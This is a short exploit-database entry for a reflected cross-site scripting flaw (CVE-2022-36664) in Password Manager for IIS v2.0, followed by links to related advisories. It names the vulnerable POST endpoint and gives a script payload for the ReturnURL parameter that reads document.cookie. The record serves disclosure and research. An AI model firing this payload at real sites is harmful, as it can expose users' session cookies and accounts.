Lucene search
VP4TR10T1337DAY-ID-38302HistoryMar 27, 2023 - 12:00 a.m.
Password Manager for IIS v2.0 - XSS Vulnerability
2023-03-2700:00:00
VP4TR10T
0day.today
152
password manager
iis
xss
vulnerability
affected uri
post request
EPSS
0.001
Percentile
47.3%
# Exploit Title: Password Manager for IIS v2.0 - XSS
# Exploit Author: VP4TR10T
# Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/
# Software Link: http://passwordmanager.adiscon.com/
<http://passwordmanager.adiscon.com/>
# Version: *Version 2.0
# Tested on: WINDOWS
# CVE : CVE-2022-36664
Affected URI (when changing user password):
POST /isapi/PasswordManager.dll HTTP/1.1
Affected Parameter in http
payload:*ReturnURL*=<script>alert(document.cookie)</script>
*Cordially,*
Related
exploitdb
exploitdb
Password Manager for IIS v2.0 - XSS
2023-03-25 00:00:00
nvd
nvd
CVE-2022-36664
2022-12-26 22:15:10
cve
cve
CVE-2022-36664
2022-12-26 22:15:10
zdt
zdt
Password Manager For IIS 2.0 Cross Site Scripting Vulneraility
2022-10-04 00:00:00
prion
prion
Cross site scripting
2022-12-26 22:15:00
cvelist
cvelist
CVE-2022-36664
2022-12-26 00:00:00
packetstorm
packetstorm
Password Manager For IIS 2.0 Cross Site Scripting
2022-10-03 00:00:00